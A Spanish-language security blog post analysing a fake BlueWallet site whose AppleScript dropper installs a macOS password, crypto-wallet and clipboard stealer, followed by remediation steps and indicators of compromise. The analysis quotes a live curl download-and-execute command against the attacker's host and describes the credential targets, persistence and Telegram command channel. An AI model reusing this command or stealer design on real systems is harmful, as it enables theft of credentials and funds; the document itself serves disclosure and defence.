Privacy, Estafas, Información sobre amenazas

La aplicación falsa BlueWallet roba contraseñas, cuentas y criptomonedas de los ordenadores Mac

por Stefan Dasic | 1 de junio de 2026
La aplicación falsa BlueWallet roba contraseñas, cuentas y criptomonedas de los ordenadores Mac

Una página web falsa que se hace pasar por BlueWallet (una cartera de bitcoins real) está dirigiendo un ataque sencillo pero eficaz contra Mac . La propia BlueWallet no se ha visto afectada. En cambio, los ciberdelincuentes han robado el nombre y la imagen de marca de la cartera de bitcoins legítima para que una descarga maliciosa parezca fiable.

Si buscabas un monedero de criptomonedas y acabaste en una de estas páginas falsas de descarga de BlueWallet, el sitio intentó engañarte para que abrieras un archivo descargado en una herramienta integrada de macOS y pulsaras «Ejecutar». Si seguiste esas instrucciones, el malware podría haber robado contraseñas guardadas, datos de inicio de sesión del navegador, monederos de criptomonedas, documentos y otros datos confidenciales. Además, supervisa el portapapeles en busca de direcciones de monederos de criptomonedas y puede sustituirlas por direcciones controladas por los atacantes.

Esta última característica es especialmente peligrosa. Si copias la dirección de un monedero antes de enviar fondos, el malware puede sustituirla de forma silenciosa por la dirección del atacante. En pantalla todo parece normal, pero el dinero va a parar a otro sitio.

¿Deberías preocuparte? Solo si has descargado y ejecutado el archivo. El mero hecho de visitar la página y cerrarla no tiene ningún efecto por sí solo. El ataque depende totalmente de que el usuario abra el script y pulse «Reproducir».

Si lo has ejecutado, considera que el equipo está comprometido y sigue los pasos que se indican a continuación.

Qué hacer si crees que lo has ejecutado

Si has abierto el archivo y has pulsado «Reproducir», da por hecho que tu dispositivo ha sido comprometido y sigue estos pasos:

  • Desconecta el equipo de la red para cortar el canal de control
  • Realiza un análisis completo del dispositivo y asegúrate de que utilizas un programa de seguridad actualizado con la protección web activada
  • Desde otro dispositivo de confianza, cambia las contraseñas de todas las cuentas que utilices en el Mac, empezando por el correo electrónico y las plataformas de intercambio de criptomonedas
  • Transfiere cualquier criptomoneda a un nuevo monedero creado en un dispositivo sin datos
  • Considera que las frases de semilla y las claves existentes están expuestas
  • Antes de enviar criptomonedas en el futuro, comprueba la dirección de destino completa, carácter por carácter
  • Busca y elimina los archivos desconocidos en ~/Library/LaunchAgents
  • Busca un .sysupd.sh archivo en /tmp
  • Renueva las credenciales de Cloud y SSH si .ssh, .awso .gnupg había archivos en el ordenador
  • En caso de duda, haz una copia de seguridad de tus datos y reinstala macOS desde una fuente fiable, en lugar de intentar realizar una reinstalación limpia en el sistema actual.

¿Has cogido algo que no debías?

Trucos de ingeniería social

Lo más interesante de esta campaña no es el aspecto técnico. Los atacantes no lograron acceder al Mac burlar las medidas de seguridad de Apple. Lo que hicieron fue convencer a las víctimas para que ejecutaran el malware por sí mismas.

La página web falsa guía a los usuarios a lo largo del proceso con una página de descarga convincente, instrucciones sencillas e incluso un atajo de teclado. El ataque tiene éxito porque la víctima confía en lo que ve.

A medida que los sistemas operativos mejoran su capacidad para bloquear el software malicioso, los atacantes recurren cada vez más a la ingeniería social. En lugar de buscar formas de eludir los controles de seguridad, convencen a los usuarios para que los ignoren.

Por eso hay un hábito que cada vez cobra más importancia: desconfía de cualquier archivo descargado que incluya instrucciones para abrirlo en una herramienta de scripting, una utilidad de desarrollo o una ventana de Terminal y pulsar «Ejecutar».

En esta campaña, bastaba con pulsar una sola vez ⌘R para convertir un Mac un programa para robar contraseñas, un ladrón de carteras de criptomonedas, un secuestrador del portapapeles y una herramienta de acceso remoto.

Análisis técnico

Primera fase: El programa de descarga de AppleScript

La página se encuentra en update-bluewallet[.]com, un nombre de dominio bastante parecido al de la cartera real (bluewallet.io) a simple vista. Lo primero que hace la página es no esperar al consentimiento. Su script activa una rutina de descarga con un temporizador de dos segundos en cuanto se carga la página, y vuelve a hacerlo si el visitante hace clic en cualquiera de los dos botones.

El archivo que se guarda en la carpeta «Descargas» se llama BlueWallet Installer.applescript, una extensión que la mayoría de la gente nunca ha visto y de la que no sospecha.

Entonces, la página hace algo muy ingenioso. Tras una breve pausa, reescribe su propio texto de estado para que parezca una guía de instalación: abre el instalador y, a continuación, pulsa el botón de reproducción o ⌘R. Incluso dibuja un pequeño triángulo azul de reproducción en el texto para que la redacción coincida con la interfaz real del Editor de scripts que la víctima está a punto de ver.

Página web falsa de BlueWallet que guía a la víctima para que descargue y ejecute el script malicioso

La página guía a la víctima paso a paso por los pasos exactos que debe seguir para ejecutar el archivo.

En las versiones actuales de macOS, las aplicaciones sin firmar descargadas de Internet se ponen en cuarentena y se comprueban antes de que puedan ejecutarse. Sin embargo, un script sin formato abierto en el Editor de scripts y ejecutado por el usuario elude ese proceso. El usuario está indicando manualmente a una herramienta de confianza de Apple que ejecute código, por lo que no hay ningún control de certificación que pueda fallar.

Por eso el atacante optó por un AppleScript en lugar de una aplicación empaquetada: así, la acción arriesgada deja de estar en manos del sistema operativo y pasa a estar en manos de la víctima.

El AppleScript en sí es sorprendentemente breve. Si se le eliminan los comentarios decorativos —entre los que se incluyen un número de versión falso y una línea que afirma ser una «actualización de Brew Install»—, ejecuta un único comando de shell codificado en base64 y, a continuación, ordena al Editor de scripts que se cierre sin guardar, borrando así cualquier rastro de su existencia.

Instalación, actualización y configuración de Brew

En pocas palabras, ese comando hace lo siguiente:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Recupera un segundo script de un servidor remoto, lo guarda en un archivo oculto del directorio temporal, lo convierte en ejecutable y lo ejecuta en segundo plano sin mostrar ninguna salida.

La víctima no ve nada. El nombre del archivo .sysupd.sh está camuflado para parecer una actualización del sistema. Se trata de un «dropper» por etapas clásico: la primera etapa es minúscula y desechable, y su única función es descargar la carga útil real.

Segunda fase: Análisis de la carga útil

Las primeras líneas definen cómo pretende funcionar el malware. Establece umask 077 por lo que todo lo que crea solo puede leerlo el usuario afectado, y luego crea un directorio de trabajo oculto con un nombre aleatorio en /tmp procedente de /dev/urandom.

Su configuración está enmascarada, aunque de forma poco eficaz. Una pequeña función llamada _xd recorre una cadena hexadecimal de dos caracteres a la vez y aplica la operación XOR a cada byte con una clave repetitiva predefinida: swckR9JCD2Uu.

Esa función descodifica el token del bot de Telegram, el identificador del chat, el token de comando secundario y la URL de prueba del script en tiempo de ejecución. Es suficiente para burlar las herramientas que solo buscan cadenas de texto sin cifrar, pero poco más. Dado que tanto la clave como el algoritmo se encuentran en el archivo, todos los valores codificados son totalmente recuperables.

Hay un detalle que llama la atención: el contenido descifrado del chat de Telegram y el del chat de comando y control son idénticos. El atacante está utilizando un único canal de Telegram tanto como punto de descarga de los datos sustraídos como canal de control. Es una solución económica, escalable, cifrada y que se camufla entre el tráfico HTTPS habitual.

No todo está encriptado. Las direcciones utilizadas para el secuestro del portapapeles aparecen en el archivo en texto sin cifrar: una dirección de Bitcoin, una de Ethereum y una de Solana. Estas son las direcciones que el implante sustituye cuando detecta que estás copiando la dirección de un monedero. Al ser públicas en sus respectivas cadenas de bloques, también se encuentran entre los datos más útiles de toda la muestra.

Lo que roba el malware

Las rutinas de recopilación de la segunda fase son exhaustivas. Se basan en seis categorías generales.

1. Navegadores web

El script extrae el historial, las cookies, los datos de inicio de sesión y los marcadores de una amplia variedad de navegadores, entre los que se incluyen:

  • Navegadores basados en Chromium: Google Chrome , beta, Canary y Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; y Yandex
  • Navegadores basados en Firefox: Firefox, Waterfox, Pale Moon, Zen y LibreWolf
  • Datos del navegador nativo de macOS: cookies, historial y valores de formularios de Safari

2. Carteras de criptomonedas

Este parece ser el objetivo principal del guion.

Está dirigido a aplicaciones de monedero de escritorio como Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop y Tonkeeper.

También se centra en las carteras que funcionan como extensiones de navegador en varios ecosistemas:

  • Bitcoin: Xverse , Leather, UniSat, Alby y Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet y Slope
  • Carteras EVM: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin y XDEFI
  • Cosmos: Keplr , Station y Cosmostation
  • Otros ecosistemas: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos y Temple

3. Gestores de contraseñas y herramientas de seguridad

El malware ataca el almacenamiento local y la configuración de varios gestores de contraseñas, entre los que se incluyen LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt y Buttercup.

También busca datos relacionados con la autenticación de dos factores (2FA) y las herramientas de autenticación, como Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS y FreeOTP.

4. Aplicaciones de comunicación y redes sociales

El script intenta copiar los datos de sesión y el almacenamiento local de Telegram Desktop y Discord, incluyendo Discord Canary y Discord PTB.

5. Herramientas para desarrolladores y en la nube

Busca credenciales y archivos de configuración en el directorio de inicio del usuario, entre ellos:

  • Configuraciones de la CLI de AWS en .aws
  • Claves SSH en .ssh
  • Claves GnuPG en .gnupg
  • Configuraciones de Kubernetes en .kube
  • Archivos de Shell y Git, entre los que se incluyen .zshrc, .zsh_history, .bash_history, y .gitconfig

6. Aplicaciones de productividad y archivos generales

El script copia la base de datos local de Apple Notes, NoteStore.sqlite.

También busca datos de extensiones del navegador relacionados con herramientas de compras y productividad, como Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist y Google Keep.

Por último, busca en las carpetas «Escritorio», «Documentos» y «Descargas» archivos con extensiones como .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, y .env, con un límite de tamaño.

Qué hace con los datos robados

El malware intenta obtener directamente la contraseña de la cuenta del usuario. Un osascript El cuadro de diálogo titulado «Preferencias del sistema» solicita al usuario que vuelva a introducir su contraseña «para continuar». El script comprueba cada intento con respecto a dscl . authonly antes de guardarlo, de modo que solo se detiene cuando dispone de unas credenciales válidas.

Para la exfiltración, archiva los datos transferidos utilizando la propia función de macOS ditto, probablemente porque siempre está presente, a diferencia de zip. Para no superar el límite de 50 MB de Telegram para la subida de archivos, divide los archivos más grandes en partes de 49 MB con split antes de enviar cada pieza.

Establece la persistencia escribiendo un archivo plist de LaunchAgent en el directorio del usuario ~/Library/LaunchAgents, respaldado por un directorio de apoyo oculto, y cargándolo con launchctl para que el implante se ejecute de nuevo cada vez que se inicie sesión.

El secuestro del portapapeles es un bucle de fondo en directo. A clip_watch La función supervisa constantemente el portapapeles, compara los formatos de las direcciones de Bitcoin, Ethereum y Solana mediante expresiones regulares, envía la dirección original al canal de comando y control, y sobrescribe el portapapeles con la dirección del atacante a través de pbcopy.

Eso significa que la sustitución se produce de forma automática al copiar y pegar.

Por último, el malware se puede controlar de forma interactiva. A c2_loop consulta los comandos del bot de Telegram y es compatible con un completo conjunto de herramientas para operadores:

  • /info para obtener información sobre el sistema
  • /exec para comandos arbitrarios del shell
  • /clipboard para leer el contenido actual del portapapeles
  • /download para extraer archivos concretos
  • /exfil para volver a ejecutar el módulo de robos
  • /selfdestruct para borrar las huellas

Esto convierte al canal de Telegram en un enlace de control remoto en tiempo real, y no solo en un canal unidireccional.

Viviendo de la tierra y de Telegram

El patrón es conocido y cada vez más habitual: recurrir a herramientas en las que ya se confía.

La entrega hace un uso indebido del propio Script Editor de Apple. La configuración se oculta tras un simple XOR, en lugar de binarios empaquetados. El canal de comandos utiliza la API de bots de Telegram, que puede sortear los filtros de salida que detectarían un servidor desconocido.

Ninguno de estos elementos es nuevo por sí solo. La eficacia radica en la combinación de componentes que parecen legítimos, de modo que ningún paso concreto active la alarma.

Oportunidades de detección

Las lecciones que se pueden extraer de esto no se centran tanto en el señuelo como en la técnica en sí.

Editor de scripts que ejecuta un código Base64 de una línea do shell script que se cierra inmediatamente es una señal de comportamiento muy clara y un objetivo de detección mucho mejor que el archivo desechable de la primera fase. Lo mismo ocurre con un archivo oculto /tmp/.sysupd.sh descargado por curl y se ejecuta en segundo plano.

Los navegadores y las plataformas de descarga podrían gestionar .applescript los archivos que llegan desde la web con el mismo recelo que los ejecutables. Y Telegram sigue siendo un medio de mando y control al que no se le presta la atención suficiente y que las denuncias de uso indebido de tokens de bot podrían desarticular desde el origen.

Indicadores de compromiso

Hashes de archivo (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Indicadores de red

  • update-bluewallet[.]com
  • projects2026box[.]com

Direcciones de secuestro del portapapeles

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

No nos limitamos a informar de las amenazas: las eliminamos

Los riesgos de ciberseguridad nunca deben propagarse más allá de un titular. Mantenga las amenazas alejadas de sus dispositivos descargando Malwarebytes hoy mismo.

Acerca del autor

Stefan Dasic

Stefan Dasic

Apasionado de las soluciones antivirus, Stefan ha participado desde muy joven en pruebas de malware y control de calidad de productos antivirus. Como parte del equipo de Malwarebytes , Stefan se dedica a proteger a los clientes y garantizar su seguridad.

ÚLTIMOS ARTÍCULOS

Noticias
semana de la seguridad

Una semana en el ámbito de la seguridad (del 25 al 31 de mayo)

Junio 1, 2026

Lista de temas que tratamos durante la semana del 25 al 31 de mayo de 2026

Podcast
Un candado ilustrado se monta en un pie de micrófono y el dispositivo emite ondas sonoras.

Las aplicaciones de pago están al tanto de lo que dices (Lock and Code, temporada 7, episodio 11)

Mayo 31, 2026

Esta semana, en el podcast «Lock and Code», hablamos con Rainey Reitman sobre la censura financiera que excluye a los clientes de las principales aplicaciones de pago.

Noticias
Logotipo de Signal

Los usuarios de Signal, blanco de ataques de phishing para robar copias de seguridad

Mayo 29, 2026

Los ciberdelincuentes se hacen pasar por el servicio de asistencia de Signal para robar las claves de recuperación de copias de seguridad, lo que les permite acceder a todos los archivos de mensajes de las víctimas.

Artículos relacionados

Icono de colaborador

Colaboradores

Icono del Centro de Amenazas

Centro de amenazas

Icono Podcasts

Podcast

Icono del glosario

Glosario

Icono de estafa

Estafas